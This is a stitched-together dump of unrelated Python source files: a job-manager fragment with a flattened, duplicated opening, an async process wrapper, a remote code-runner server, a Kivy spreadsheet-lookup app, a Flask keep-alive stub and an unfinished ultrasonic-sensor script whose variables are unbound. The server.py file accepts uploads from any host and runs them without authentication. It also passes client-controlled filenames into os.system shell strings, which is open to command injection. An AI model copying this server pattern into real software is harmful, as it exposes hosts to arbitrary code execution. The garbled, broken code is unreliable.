            if job_directory.has_metadata(JOB_FILE_PREPROCESSING_FAILED):
                final_status = status.FAILED
            self.__state_change_callback(final_status, job_id)

        new_thread_for_job(self, "postprocess", job_id, do_postprocess, daemon=False)
job_directory.has_metadata(JOB_FILE_PREPROCESSING_FAILED): final_status = status.FAILED self.__state_change_callback(final_status, job_id) new_thread_for_job(self, "postprocess", job_id, do_postprocess, daemon=False) def shutdown(self, timeout=None): if self.__monitor: try: self.__monitor.shutdown(timeout) except Exception: log.exception("Failed to shutdown job monitor for manager %s" % self.name) super(StatefulManagerProxy, self).shutdown(timeout) def recover_active_jobs(self): unqueue_preprocessing_ids = [] for job_id in self.active_jobs.active_job_ids(active_status=ACTIVE_STATUS_PREPROCESSING): job_directory = self._proxied_manager.job_directory(job_id) if not job_directory.has_metadata("launch_config"): log.warn("Failed to find launch parameters for job scheduled to prepreprocess [%s]" % job_id) unqueue_preprocessing_ids.append(job_id) elif job_directory.has_metadata(JOB_FILE_PREPROCESSED): log.warn("Job scheduled to prepreprocess [%s] already preprocessed, skipping" % job_id) unqueue_preprocessing_ids.append(job_id) elif job_directory.has_metadata(JOB_FILE_PREPROCESSING_FAILED): log.warn("Job scheduled to prepreprocess [%s] previously failed preprocessing, skipping" % job_id) unqueue_preprocessing_ids.append(job_id) else: launch_config = job_directory.load_metadata("launch_config") self._launch_prepreprocessing_thread(job_id, launch_config) for unqueue_preprocessing_id in unqueue_preprocessing_ids: self.active_job_directory.deactivate_job(unqueue_preprocessing_id, active_status=ACTIVE_STATUS_PREPROCESSING) recover_method = getattr(self._proxied_manager, "_recover_active_job", None) if recover_method is None: return for job_id in self.active_jobs.active_job_ids(active_status=ACTIVE_STATUS_LAUNCHED): try: recover_method(job_id) except Exception: log.exception("Failed to recover active job %s" % job_id) self.__handle_recovery_problem(job_id) def __handle_recovery_problem(self, job_id): # Make sure we tell the client we have lost this job. 
class ActiveJobs(object):
    """ Keeps track of active jobs (those that are not yet "complete").
    Current implementation is file based, but could easily be made
    database-based instead.

    TODO: Keep jobs in memory after initial load so don't need to repeatedly
    hit disk to recover this information.
    """

    @staticmethod
    def from_manager(manager):
        # Alternate constructor pulling location information off the manager.
        persistence_directory = manager.persistence_directory
        manager_name = manager.name
        return ActiveJobs(manager_name, persistence_directory)

    def __init__(self, manager_name, persistence_directory):
        # Without a persistence directory, all tracking becomes a no-op.
        if persistence_directory:
            active_job_directory = os.path.join(persistence_directory, "%s-active-jobs" % manager_name)
            if not os.path.exists(active_job_directory):
                os.makedirs(active_job_directory)
            preprocessing_job_directory = os.path.join(persistence_directory, "%s-preprocessing-jobs" % manager_name)
            if not os.path.exists(preprocessing_job_directory):
                os.makedirs(preprocessing_job_directory)
        else:
            active_job_directory = None
            preprocessing_job_directory = None
        self.launched_job_directory = active_job_directory
        self.preprocessing_job_directory = preprocessing_job_directory

    def active_job_ids(self, active_status=ACTIVE_STATUS_LAUNCHED):
        """List ids of jobs currently tracked for the given active status."""
        job_ids = []
        target_directory = self._active_job_directory(active_status)
        if target_directory:
            job_ids = os.listdir(target_directory)
        return job_ids

    def activate_job(self, job_id, active_status=ACTIVE_STATUS_LAUNCHED):
        """Mark a job active by touching its marker file (best effort)."""
        if self._active_job_directory(active_status):
            path = self._active_job_file(job_id, active_status=active_status)
            try:
                open(path, "w").close()
            except Exception:
                # log.warn is a deprecated alias - use warning()
                log.warning(ACTIVATE_FAILED_MESSAGE % job_id)

    def deactivate_job(self, job_id, active_status=ACTIVE_STATUS_LAUNCHED):
        """Remove a job's marker file, if present (best effort)."""
        if self._active_job_directory(active_status):
            path = self._active_job_file(job_id, active_status=active_status)
            if os.path.exists(path):
                try:
                    os.remove(path)
                except Exception:
                    log.warning(DECACTIVATE_FAILED_MESSAGE % job_id)

    def _active_job_directory(self, active_status):
        # Map an active-status constant to its marker-file directory.
        if active_status == ACTIVE_STATUS_LAUNCHED:
            target_directory = self.launched_job_directory
        elif active_status == ACTIVE_STATUS_PREPROCESSING:
            target_directory = self.preprocessing_job_directory
        else:
            raise Exception("Unknown active state encountered [%s]" % active_status)
        return target_directory

    def _active_job_file(self, job_id, active_status=ACTIVE_STATUS_LAUNCHED):
        return os.path.join(self._active_job_directory(active_status), job_id)


class ManagerMonitor(object):
    """ Monitors active jobs of a StatefulManagerProxy.
    """

    def __init__(self, stateful_manager):
        self.stateful_manager = stateful_manager
        self.active = True
        thread = new_thread_for_manager(self.stateful_manager, "[action=monitor]", self._run, True)
        self.thread = thread

    def shutdown(self, timeout=None):
        """Signal the monitor loop to stop and wait (up to timeout) for it."""
        self.active = False
        self.thread.join(timeout)
        # Fix: Thread.isAlive() was removed in Python 3.9 - use is_alive().
        if self.thread.is_alive():
            log.warning("Failed to join monitor thread [%s]" % self.thread)

    def _run(self):
        """ Main loop, repeatedly checking active jobs of stateful manager.
        """
        while self.active:
            try:
                self._monitor_active_jobs()
            except Exception:
                log.exception("Failure in stateful manager monitor step.")

    def _monitor_active_jobs(self):
        # Poll every launched job once, then sleep out the remainder of the
        # manager's minimum polling interval.
        active_job_ids = self.stateful_manager.active_jobs.active_job_ids()
        iteration_start = datetime.datetime.now()
        for active_job_id in active_job_ids:
            try:
                self._check_active_job_status(active_job_id)
            except Exception:
                log.exception("Failed checking active job status for job_id %s" % active_job_id)
        iteration_end = datetime.datetime.now()
        iteration_length = iteration_end - iteration_start
        if iteration_length < self.stateful_manager.min_polling_interval:
            to_sleep = self.stateful_manager.min_polling_interval - iteration_length
            # timedelta.total_seconds() replaces the manual microsecond math.
            time.sleep(to_sleep.total_seconds())

    def _check_active_job_status(self, active_job_id):
        # Manager itself will handle state transitions when status changes,
        # just need to poll get_status
        self.stateful_manager.get_status(active_job_id)


def new_thread_for_job(manager, action, job_id, target, daemon):
    """Spawn a named thread for a per-job action (preprocess/postprocess)."""
    name = "[action=%s]-[job=%s]" % (action, job_id)
    return new_thread_for_manager(manager, name, target, daemon)


def new_thread_for_manager(manager, name, target, daemon):
    """Spawn and start a thread named after the manager plus *name*."""
    thread_name = "[manager=%s]-%s" % (manager.name, name)
    thread = threading.Thread(name=thread_name, target=target)
    thread.daemon = daemon
    thread.start()
    return thread


__all__ = ('StatefulManagerProxy',)
process.py
import atexit
from datetime import timedelta
import logging
import os
from queue import Queue as PyQueue
import re
import threading
import weakref

from .utils import mp_context

from tornado import gen
from tornado.concurrent import Future
from tornado.ioloop import IOLoop

logger = logging.getLogger(__name__)


def _loop_add_callback(loop, func, *args):
    """
    Helper to silence "IOLoop is closing" exception on IOLoop.add_callback.
    """
    try:
        loop.add_callback(func, *args)
    except RuntimeError as exc:
        # Only swallow the "loop is shutting down" race; anything else is a bug.
        if not re.search("IOLoop is clos(ed|ing)", str(exc)):
            raise


def _call_and_set_future(loop, future, func, *args, **kwargs):
    # Run func() on the current (non-loop) thread and publish the outcome
    # onto *future* from the loop's thread.
    try:
        res = func(*args, **kwargs)
    except Exception as exc:
        # Tornado futures are not thread-safe, need to
        # set_result() / set_exc_info() from the loop's thread
        _loop_add_callback(loop, future.set_exception, exc)
    else:
        _loop_add_callback(loop, future.set_result, res)


class _ProcessState(object):
    # Mutable snapshot of the child process, shared between the watcher
    # threads and the owning AsyncProcess.
    is_alive = False
    pid = None
    exitcode = None


class AsyncProcess(object):
    """
    A coroutine-compatible multiprocessing.Process-alike.
    All normally blocking methods are wrapped in Tornado coroutines.
    """

    def __init__(self, loop=None, target=None, name=None, args=(), kwargs={}):
        # NOTE(review): kwargs={} is a mutable default; harmless here because
        # it is only forwarded, never mutated.
        if not callable(target):
            raise TypeError("`target` needs to be callable, not %r" % (type(target),))
        self._state = _ProcessState()
        self._loop = loop or IOLoop.current(instance=False)

        # _keep_child_alive is the write side of a pipe, which, when it is
        # closed, causes the read side of the pipe to unblock for reading. Note
        # that it is never closed directly. The write side is closed by the
        # kernel when our process exits, or possibly by the garbage collector
        # closing the file descriptor when the last reference to
        # _keep_child_alive goes away. We can take advantage of this fact to
        # monitor from the child and exit when the parent goes away unexpectedly
        # (for example due to SIGKILL). This variable is otherwise unused except
        # for the assignment here.
        parent_alive_pipe, self._keep_child_alive = mp_context.Pipe(duplex=False)

        self._process = mp_context.Process(
            target=self._run,
            name=name,
            args=(target, args, kwargs, parent_alive_pipe, self._keep_child_alive),
        )
        _dangling.add(self._process)
        self._name = self._process.name
        self._watch_q = PyQueue()
        self._exit_future = Future()
        self._exit_callback = None
        self._closed = False

        self._start_threads()

    def __repr__(self):
        return "<%s %s>" % (self.__class__.__name__, self._name)

    def _check_closed(self):
        # Guard used by every public method: operating on a closed
        # AsyncProcess is a programming error.
        if self._closed:
            raise ValueError("invalid operation on closed AsyncProcess")

    def _start_threads(self):
        # One thread serialises all multiprocessing.Process operations
        # (start/terminate), since that API is not thread-safe.
        self._watch_message_thread = threading.Thread(
            target=self._watch_message_queue,
            name="AsyncProcess %s watch message queue" % self.name,
            args=(
                weakref.ref(self),
                self._process,
                self._loop,
                self._state,
                self._watch_q,
                self._exit_future,
            ),
        )
        self._watch_message_thread.daemon = True
        self._watch_message_thread.start()

        def stop_thread(q):
            q.put_nowait({"op": "stop"})

        # We don't join the thread here as a finalizer can be called
        # asynchronously from anywhere
        self._finalizer = weakref.finalize(self, stop_thread, q=self._watch_q)
        self._finalizer.atexit = False

    def _on_exit(self, exitcode):
        # Called from the event loop when the child process exited
        self._process = None
        if self._exit_callback is not None:
            self._exit_callback(self)
        self._exit_future.set_result(exitcode)

    @classmethod
    def _immediate_exit_when_closed(cls, parent_alive_pipe):
        """
        Immediately exit the process when parent_alive_pipe is closed.
        """
        def monitor_parent():
            try:
                # The parent_alive_pipe should be held open as long as the
                # parent is alive and wants us to stay alive. Nothing writes to
                # it, so the read will block indefinitely.
                parent_alive_pipe.recv()
            except EOFError:
                # Parent process went away unexpectedly. Exit immediately. Could
                # consider other exiting approches here. My initial preference
                # is to unconditionally and immediately exit. If we're in this
                # state it is possible that a "clean" process exit won't work
                # anyway - if, for example, the system is getting bogged down
                # due to the running out of memory, exiting sooner rather than
                # later might be needed to restore normal system function.
                # If this is in appropriate for your use case, please file a
                # bug.
                os._exit(-1)
            else:
                # If we get here, something odd is going on. File descriptors
                # got crossed?
                raise RuntimeError("unexpected state: should be unreachable")

        t = threading.Thread(target=monitor_parent)
        t.daemon = True
        t.start()

    @staticmethod
    def reset_logger_locks():
        """ Python 2's logger's locks don't survive a fork event

        https://github.com/dask/distributed/issues/1491
        """
        for name in logging.Logger.manager.loggerDict.keys():
            for handler in logging.getLogger(name).handlers:
                handler.createLock()

    @classmethod
    def _run(cls, target, args, kwargs, parent_alive_pipe, _keep_child_alive):
        # On Python 2 with the fork method, we inherit the _keep_child_alive fd,
        # whether it is passed or not. Therefore, pass it unconditionally and
        # close it here, so that there are no other references to the pipe lying
        # around.
        cls.reset_logger_locks()
        _keep_child_alive.close()

        # Child process entry point
        cls._immediate_exit_when_closed(parent_alive_pipe)

        threading.current_thread().name = "MainThread"
        target(*args, **kwargs)

    @classmethod
    def _watch_message_queue(cls, selfref, process, loop, state, q, exit_future):
        # As multiprocessing.Process is not thread-safe, we run all
        # blocking operations from this single loop and ship results
        # back to the caller when needed.
        r = repr(selfref())
        name = selfref().name

        def _start():
            process.start()

            thread = threading.Thread(
                target=AsyncProcess._watch_process,
                name="AsyncProcess %s watch process join" % name,
                args=(selfref, process, state, q),
            )
            thread.daemon = True
            thread.start()

            state.is_alive = True
            state.pid = process.pid
            logger.debug("[%s] created process with pid %r" % (r, state.pid))

        while True:
            msg = q.get()
            logger.debug("[%s] got message %r" % (r, msg))
            op = msg["op"]
            if op == "start":
                _call_and_set_future(loop, msg["future"], _start)
            elif op == "terminate":
                _call_and_set_future(loop, msg["future"], process.terminate)
            elif op == "stop":
                break
            else:
                assert 0, msg

    @classmethod
    def _watch_process(cls, selfref, process, state, q):
        r = repr(selfref())
        process.join()
        exitcode = process.exitcode
        assert exitcode is not None
        logger.debug("[%s] process %r exited with code %r", r, state.pid, exitcode)
        state.is_alive = False
        state.exitcode = exitcode
        # Make sure the process is removed from the global list
        # (see _children in multiprocessing/process.py)
        # Then notify the Process object
        self = selfref()  # only keep self alive when required
        try:
            if self is not None:
                _loop_add_callback(self._loop, self._on_exit, exitcode)
        finally:
            self = None  # lose reference

    def start(self):
        """
        Start the child process.

        This method is a coroutine.
        """
        self._check_closed()
        fut = Future()
        self._watch_q.put_nowait({"op": "start", "future": fut})
        return fut

    def terminate(self):
        """
        Terminate the child process.

        This method is a coroutine.
        """
        self._check_closed()
        fut = Future()
        self._watch_q.put_nowait({"op": "terminate", "future": fut})
        return fut

    @gen.coroutine
    def join(self, timeout=None):
        """
        Wait for the child process to exit.

        This method is a coroutine.  A timeout expiry is silently
        swallowed; callers should check ``exitcode`` afterwards.
        """
        self._check_closed()
        assert self._state.pid is not None, "can only join a started process"
        if self._state.exitcode is not None:
            return
        if timeout is None:
            yield self._exit_future
        else:
            try:
                yield gen.with_timeout(timedelta(seconds=timeout), self._exit_future)
            except gen.TimeoutError:
                pass

    def close(self):
        """
        Stop helper thread and release resources.  This method returns
        immediately and does not ensure the child process has exited.
        """
        if not self._closed:
            self._finalizer()
            self._process = None
            self._closed = True

    def set_exit_callback(self, func):
        """
        Set a function to be called by the event loop when the process exits.
        The function is called with the AsyncProcess as sole argument.

        The function may be a coroutine function.
        """
        # XXX should this be a property instead?
        assert callable(func), "exit callback should be callable"
        assert (
            self._state.pid is None
        ), "cannot set exit callback when process already started"
        self._exit_callback = func

    def is_alive(self):
        return self._state.is_alive

    @property
    def pid(self):
        return self._state.pid

    @property
    def exitcode(self):
        return self._state.exitcode

    @property
    def name(self):
        return self._name

    @property
    def daemon(self):
        return self._process.daemon

    @daemon.setter
    def daemon(self, value):
        self._process.daemon = value


# Processes created but not yet reaped; used by the atexit hook below.
_dangling = weakref.WeakSet()


@atexit.register
def _cleanup_dangling():
    # Best-effort termination of any child still alive at interpreter exit.
    for proc in list(_dangling):
        if proc.is_alive():
            try:
                logger.info("reaping stray process %s" % (proc,))
                proc.terminate()
            except OSError:
                pass
server.py
from socketserver import *
import os, json, struct, pprint
import threading
import pexpect

# Listen address/port of the remote code-execution service.
test_home = "0.0.0.0"
PORT = 8875
TEST_HOME = (test_home, PORT)
base_dir = os.path.dirname((os.path.abspath(__file__)))
DISPLAY = []                # console output queued for the client
PARAMS = []                 # stdin arguments received from the client
flag = 0                    # set to 1 once the child program finished
allowToReceiveArgs = False  # True while the child is waiting for input


def compile(cmd):
    # Run a build command via the shell.
    # NOTE(review): shadows the builtin compile(); rename if feasible.
    os.system(cmd)


# Pop one user input from the list and feed it to the child's console.
def sendto_console(child):
    global PARAMS
    alreadySendFlag = False
    while True:
        if len(PARAMS) > 0:
            print("already get the args")
            child.sendline(PARAMS.pop(0).encode('utf-8'))
            break
        else:
            if not alreadySendFlag:
                global allowToReceiveArgs
                allowToReceiveArgs = True  # start accepting arguments
                alreadySendFlag = True
            # NOTE(review): busy-wait with no sleep; burns a full CPU core
            # while waiting for the client to send an argument.
            continue


# Save the console output into the list that is sent back to the client.
def sendto_client(content):
    DISPLAY.append(str(content, encoding='utf-8'))


# Drive the interpreter that executes the client's file.
def interact(cmd):
    global PARAMS
    PARAMS = []
    print("running cmd: " + cmd)
    child = pexpect.spawn(cmd)
    child.setecho(False)
    child.timeout = 0.5
    while True:
        print("try to run")
        try:
            child.expect('.+')
            if not child.isalive():
                print("run cmd to the end")
                print(child.after.strip())
                sendto_client(child.after.strip())  # send the result back
                global flag
                flag = 1  # end-of-program marker
                break
            sendto_client(child.after)
            sendto_console(child)
        except:
            # Typically a pexpect TIMEOUT: the child is waiting for stdin.
            print("some exception happen while runnnig the cmd")
            sendto_console(child)


# Main dispatcher: run the client's file with the interpreter matching its type.
def call(filename, filetype):
    if filetype == 'C':
        compile_c(filename)
    elif filetype == 'C++':
        compile_c_plus(filename)
    elif filetype == 'Java':
        compile_java(filename)
    elif filetype == 'python':
        compile_python(filename)
    elif filetype == 'python3':
        compile_python3(filename)


def compile_python(filename):
    cmd = 'python ' + filename
    interact(cmd)


def compile_python3(filename):
    cmd = 'python3 ' + filename
    interact(cmd)


def compile_c(filename):
    # Build with gcc, then run the produced binary interactively.
    os.system("rm -f app")
    cmd = 'gcc ' + filename + ' -o app -lm'
    os.system(cmd)
    cmd = 'bash -c "./app"'
    interact(cmd)


def compile_c_plus(filename):
    os.system("rm -f app")
    cmd = 'g++ ' + filename + ' -o app'
    os.system(cmd)
    cmd = 'bash -c "./app"'
    interact(cmd)


def compile_java(filename):
    # javac produces <name>.class; run it with the bare class name.
    cmd = 'javac ' + filename
    os.system(cmd)
    os.system("rm -f " + filename)
    file = filename[:-5]
    print(file)
    cmd = 'bash -c "java ' + file + '"'
    interact(cmd)


class MyRequestHandler(StreamRequestHandler):

    def feedback(self):
        # Sender thread: push queued console output to the client.
        while True:
            if not DISPLAY:  # nothing waiting to be sent
                continue
            self.request.send(DISPLAY.pop(0).encode('utf-8'))
            global flag
            if flag == 1:
                break

    def paramReceive(self):
        # Receiver thread: read argument strings from the client and queue
        # them for the child's stdin.
        while True:
            try:
                global flag
                if flag == 1:  # has the program finished?
                    break
                global allowToReceiveArgs
                if not allowToReceiveArgs:  # only read when input is expected
                    continue
                print('wait to receive args from client')
                param = self.request.recv(1024).decode('utf-8')  # receive one argument
                if not param:
                    continue
                allowToReceiveArgs = False
                print('success to receive args from client')
                #pprint.pprint(param)
                PARAMS.append(param)
                #pprint.pprint(PARAMS)
            except:
                print('some exception happen while waiting to receive args from client')
                break

    def upload(self, hander):
        # Receive the client's uploaded source file; returns the (possibly
        # renamed) filename on success, "" on failure.
        try:
            filesize = hander['filesize']
            whole_data = b''
            current_size = 0
            while current_size < filesize:
                data = self.request.recv(1024)
                current_size = current_size + len(data)
                whole_data = whole_data + data
            filename = hander['filename']
            i = 0
            #print(whole_data)
            while True:
                if os.path.exists(filename):
                    # Name collision: keep inserting an increasing index
                    # before the suffix until the name is free.
                    filename_list = filename.rsplit(".", maxsplit=1)
                    filename = filename_list[0] + str(i) + "." + filename_list[1]
                    i = i + 1
                else:
                    f = open(filename, "w", encoding="utf-8")
                    f.write(str(whole_data, encoding='utf-8'))
                    f.close()
                    return filename
        except:
            return ""

    def handle(self):
        # Entry point: wait for the client's header packet, then serve
        # upload + execute + interactive I/O for each request.
        try:
            while True:
                global flag
                global PARAMS
                global allowToReceiveArgs
                allowToReceiveArgs = False
                flag = 0
                PARAMS = []
                # First 4 bytes: little-endian int length of the JSON header.
                # The header carries the order, file name, file size, language.
                json_length = self.request.recv(4)
                json_hander = b''
                while len(json_hander) < struct.unpack('i', json_length)[0]:
                    info = self.request.recv(struct.unpack('i', json_length)[0])
                    json_hander += info
                hander = json.loads(json_hander.decode("utf-8"))
                order = hander['order']
                # e.g. hander = {'order': 'upload', 'filename': 'notepad.cpp',
                #                'filesize': 60, "language": "C"}
                if order == 'upload':
                    result = self.upload(hander)
                    if not result:
                        print("fail to get the source file name")
                        return False
                    t1 = threading.Thread(target=self.feedback)      # reply thread
                    t2 = threading.Thread(target=self.paramReceive)  # receive thread
                    t1.start()
                    t2.start()
                    call(result, hander['language'])
                    os.system("rm -f " + result)
                    t1.join()
                    print("program come to the end.")
                    # NOTE(review): socket.shutdown() requires a `how`
                    # argument (e.g. socket.SHUT_RDWR); as written this
                    # raises TypeError, caught by the bare except below.
                    self.request.shutdown()
        except:
            return 0


if __name__ == '__main__':
    server = ThreadingTCPServer(TEST_HOME, MyRequestHandler)
    server.serve_forever()
main.py
import os
import threading

import openpyxl
import kivy
from kivy.app import App
from kivy.uix.label import Label
from kivy.uix.textinput import TextInput
from kivy.uix.button import Button
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.popup import Popup
from kivy.properties import ObjectProperty
from kivy.core.window import Window

import excel
import onedrive

# Config file: three lines — number of designs, local excel path, remote URL.
CONF_FILE = "TecMartz.conf"
NUMERO_DISENOS = 0
PATH_EXCEL = ""
URL_EXCEL = ""
MODELOS = {}


class PopupResult(Popup):
    """Popup that displays the outcome of a model search."""
    lblResult = ObjectProperty()

    def __init__(self, result, busqueda, **kwargs):
        # BUGFIX: was super(Popup, self).__init__, which skips Popup's own
        # initializer; super(PopupResult, self) runs the full MRO chain.
        super(PopupResult, self).__init__(**kwargs)
        self.lblResult.text = result
        self.title += " \"" + busqueda + "\""


class PopupConf(Popup):
    """Configuration popup; persists changed values when dismissed."""
    txtNumDisenos = ObjectProperty()
    txtLocalExcel = ObjectProperty()
    txtRemoteExcel = ObjectProperty()

    def __init__(self, **kwargs):
        # BUGFIX: same super() correction as PopupResult.
        super(PopupConf, self).__init__(**kwargs)
        self.txtNumDisenos.text = str(NUMERO_DISENOS)
        self.txtLocalExcel.text = PATH_EXCEL
        self.txtRemoteExcel.text = URL_EXCEL

    def on_dismiss(self):
        global NUMERO_DISENOS, PATH_EXCEL, URL_EXCEL
        # Only rewrite the conf file when something actually changed.
        if NUMERO_DISENOS != int(self.txtNumDisenos.text) \
                or PATH_EXCEL != self.txtLocalExcel.text \
                or URL_EXCEL != self.txtRemoteExcel.text:
            NUMERO_DISENOS = int(self.txtNumDisenos.text)
            PATH_EXCEL = self.txtLocalExcel.text
            URL_EXCEL = self.txtRemoteExcel.text
            with open(CONF_FILE, "w") as f:
                f.write("\n".join([str(NUMERO_DISENOS), PATH_EXCEL, URL_EXCEL]) + "\n")


class MyGrid(FloatLayout):
    """Main screen: search box, status label and update/search buttons."""
    txtModelo = ObjectProperty()
    lblEstado = ObjectProperty()
    btnUpdate = ObjectProperty()
    btnSearch = ObjectProperty()

    def inicializar_globales(self):
        """Load the persisted configuration, creating defaults if absent."""
        global NUMERO_DISENOS, PATH_EXCEL, URL_EXCEL
        if os.path.isfile(CONF_FILE):
            with open(CONF_FILE, "r") as f:
                d = f.readlines()
            NUMERO_DISENOS = int(d[0][:-1])
            PATH_EXCEL = d[1][:-1]
            # BUGFIX: the writer always appends a trailing "\n", so d[2]
            # used to keep that newline inside the URL.
            URL_EXCEL = d[2].rstrip("\n")
        else:
            NUMERO_DISENOS = 8
            PATH_EXCEL = "Existencias actual 070719.xlsx"
            URL_EXCEL = ""  # CENSORED
            with open(CONF_FILE, "w") as f:
                f.write("\n".join([str(NUMERO_DISENOS), PATH_EXCEL, URL_EXCEL]) + "\n")

    def descargar_y_leer_excel(self, force_download=False):
        """Download the excel file (if needed) and parse it into MODELOS."""
        self.btnUpdate.disabled = True
        global MODELOS
        if not os.path.isfile(PATH_EXCEL) or force_download:
            self.lblEstado.text = "Descargando excel..."
            try:
                onedrive.download_excel(URL_EXCEL, PATH_EXCEL)
            except Exception as err:
                self.lblEstado.text = "Error descargando excel: " + str(err.__repr__())
                self.btnUpdate.disabled = False
                return
        self.lblEstado.text = "Leyendo excel..."
        try:
            MODELOS, errores = excel.get_modelos(PATH_EXCEL, NUMERO_DISENOS)
            self.lblEstado.text = "\n".join(errores) + "\n\nListo"
        except Exception as err:
            self.lblEstado.text = "Error leyendo excel: " + str(err.__repr__())
            self.btnUpdate.disabled = False
            return
        self.btnUpdate.disabled = False

    def btnSearch_onclick(self):
        # Run off the UI thread so the interface stays responsive.
        threading.Thread(target=self._btnSearch_onclick).start()

    def btnUpdate_onclick(self):
        threading.Thread(target=self._btnUpdate_onclick).start()

    def btnConf_onclick(self):
        popup = PopupConf()
        popup.open()

    def _btnUpdate_onclick(self):
        self.descargar_y_leer_excel(True)

    def _btnSearch_onclick(self):
        """Worker: look up the typed model and show the result in a popup."""
        busqueda = self.txtModelo.text
        if not busqueda:
            self.lblEstado.text = "Por favor introduzca el modelo a buscar."
            return
        self.btnSearch.disabled = True
        self.lblEstado.text = "Realizando la búsqueda..."
        try:
            result = excel.buscar_modelos(MODELOS, busqueda)
        except Exception as err:
            self.lblEstado.text = "Error buscando el modelo: " + str(err.__repr__())
            self.btnSearch.disabled = False
            return
        result_str = excel.sprint_modelos(result)
        popup_msg = result_str if result_str else "No se ha encontrado ningún modelo."
        popup = PopupResult(popup_msg, busqueda)
        popup.open()
        self.lblEstado.text = "Listo"
        self.btnSearch.disabled = False


class MyApp(App):
    def build(self):
        self.title = "Klecko fucking boss"
        #Window.size = (360, 640)
        Window.clearcolor = (1, 1, 1, 1)
        return MyGrid()

    def on_start(self):
        # Load config and data as soon as the UI is up.
        self.root.inicializar_globales()
        self.root.descargar_y_leer_excel()


if __name__ == '__main__':
    MyApp().run()
keep_alive.py
from flask import Flask
from threading import Thread

# Minimal web app whose only job is to answer uptime-pinger requests.
app = Flask('')


@app.route('/')
def main():
    # Redirect every visitor straight to the credits page.
    return '<meta http-equiv="refresh" content="0; URL=https://phantom.codes/credits"/>'


def run():
    # Bind to all interfaces so external pingers can reach the server.
    app.run(host="0.0.0.0", port=8080)


def keep_alive():
    # Serve in a background thread so the caller is not blocked.
    Thread(target=run).start()
ultrasonic_hcsr04.py
# --------------------------------------------------------------------------- #
# Title: Ultrasonic measure and interpretation script
# Author: Arthur Telles, Eduardo Brizida, Balthazar Paixao
# Date: 01/07/2018 (DD/MM/YYYY)
# Description:
# --------------------------------------------------------------------------- #
import sys
import time
import signal
import RPi.GPIO as GPIO
from multiprocessing import Process
import numpy as np
from lib.MotorAtual import Motor as motor

# Use only this library for the ultrasonic sensors.
class Ultrassom():
    def __init__(self):
        # left sensor pins
        self.trigA = 13
        self.echoA = 27
        # center-left
        self.trigB = 19
        self.echoB = 22
        # center-right
        self.trigC = 6
        self.echoC = 17
        # right
        self.trigD = 4
        self.echoD = 20
        self.tempo = time.time()
        # NOTE(review): trigA/echoA/... below are unbound local names —
        # presumably self.trigA etc. were intended; confirm before running.
        GPIO.setup(trigA, GPIO.OUT)
        GPIO.setup(echoA, GPIO.IN)
        GPIO.setup(trigB, GPIO.OUT)
        GPIO.setup(echoB, GPIO.IN)
        GPIO.setup(trigC, GPIO.OUT)
        GPIO.setup(echoC, GPIO.IN)
        GPIO.setup(trigD, GPIO.OUT)
        GPIO.setup(echoD, GPIO.IN)
        # Main-loop control variables:
        # sampling_rate: sampling rate in Hz, i.e. how many sonar readings
        #     are taken per second on average
        # speed_of_sound: speed of sound in air at 30 C, in m/s
        # max_distance: maximum distance allowed for a measurement
        # max_delta_t: upper bound for delta_t, derived from max_distance
        # NOTE(review): these are locals of __init__ in the recovered source,
        # yet other methods read self.max_delta_t — that attribute is never
        # set; confirm the intended scope.
        sampling_rate = 20.0
        speed_of_sound = 349.10
        max_distance = 4.0
        max_delta_t = max_distance / speed_of_sound

        def sigint_handler(signum, instant):
            # NOTE(review): clean() is not defined anywhere in this file.
            clean()

        # Enable capture of the SIGINT signal (Ctrl-C)
        signal.signal(signal.SIGINT, sigint_handler)

        # Initialise the TRIG pins at logic-low level
        # NOTE(review): unbound trigA/... again; left byte-identical.
        GPIO.output(trigA, False)
        GPIO.output(trigB, False)
        GPIO.output(trigC, False)
        GPIO.output(trigD, False)

    def leitura(self):
        # Take 5 readings per sensor and reduce each to its median.
        vA = []; vB = []; vC = []; vD = []
        for i in range(0, 5):
            GPIO.output(self.trigA, True)
            time.sleep(0.00001)
            GPIO.output(self.trigA, False)
            while GPIO.input(self.echoA) == 0:
                start_tA = time.time()
            while (GPIO.input(self.echoA) == 1 and
                   time.time() - start_tA < self.max_delta_t):
                end_tA = time.time()
            GPIO.output(self.trigB, True)
            time.sleep(0.00001)
            GPIO.output(self.trigB, False)
            while GPIO.input(self.echoB) == 0:
                start_tB = time.time()
            while (GPIO.input(self.echoB) == 1 and
                   time.time() - start_tB < self.max_delta_t):
                end_tB = time.time()
            GPIO.output(self.trigC, True)
            time.sleep(0.00001)
            GPIO.output(self.trigC, False)
            while GPIO.input(self.echoC) == 0:
                start_tC = time.time()
            while (GPIO.input(self.echoC) == 1 and
                   time.time() - start_tC < self.max_delta_t):
                end_tC = time.time()
            GPIO.output(self.trigD, True)
            time.sleep(0.00001)
            GPIO.output(self.trigD, False)
            while GPIO.input(self.echoD) == 0:
                start_tD = time.time()
            while (GPIO.input(self.echoD) == 1 and
                   time.time() - start_tD < self.max_delta_t):
                end_tD = time.time()
            # If end_t - start_t is within the imposed limits, update delta_t
            # and compute the distance to an obstacle.  If delta_t falls
            # outside the limits, set the distance to -1 to flag a failed
            # measurement.
            # NOTE(review): bare max_delta_t / speed_of_sound here are unbound
            # at method scope in the recovered source.
            if end_tA - start_tA < max_delta_t:
                delta_tA = end_tA - start_tA
                distanceA = 100*(0.5 * delta_tA * speed_of_sound)
            else:
                distanceA = -1
            if end_tB - start_tB < max_delta_t:
                delta_tB = end_tB - start_tB
                distanceB = 100*(0.5 * delta_tB * speed_of_sound)
            else:
                distanceB = -1
            if end_tC - start_tC < max_delta_t:
                delta_tC = end_tC - start_tC
                distanceC = 100*(0.5 * delta_tC * speed_of_sound)
            else:
                distanceC = -1
            if end_tD - start_tD < max_delta_t:
                delta_tD = end_tD - start_tD
                distanceD = 100*(0.5 * delta_tD * speed_of_sound)
            else:
                distanceD = -1
            vA.append(distanceA)
            vB.append(distanceB)
            vC.append(distanceC)
            vD.append(distanceD)
        mA = np.median(vA)
        mB = np.median(vB)
        mC = np.median(vC)
        mD = np.median(vD)
        DiferentialBC = mB - mC
        #print(str(tpp - time()) + " seconds")
        # metricA and metricB must always return very large values; when they
        # return something below 300 cm MORE THAN 3 TIMES, that is an obstacle
        # and we must escape it.  If that reading keeps shrinking we are
        # approaching the obstacle and must dodge it even faster — use the
        # block logic in the "logistica trekking" drive document.  The closer
        # we get, the faster we turn away.
        # Handle the cases of reliable readings on 2 sensors and on 1 sensor;
        # different logic for the left/right sensors vs the two centre ones.
        # With 1 sensor we turn faster so another detects; we can only align
        # properly once 2 sensors detect.

    def navegacao(self):
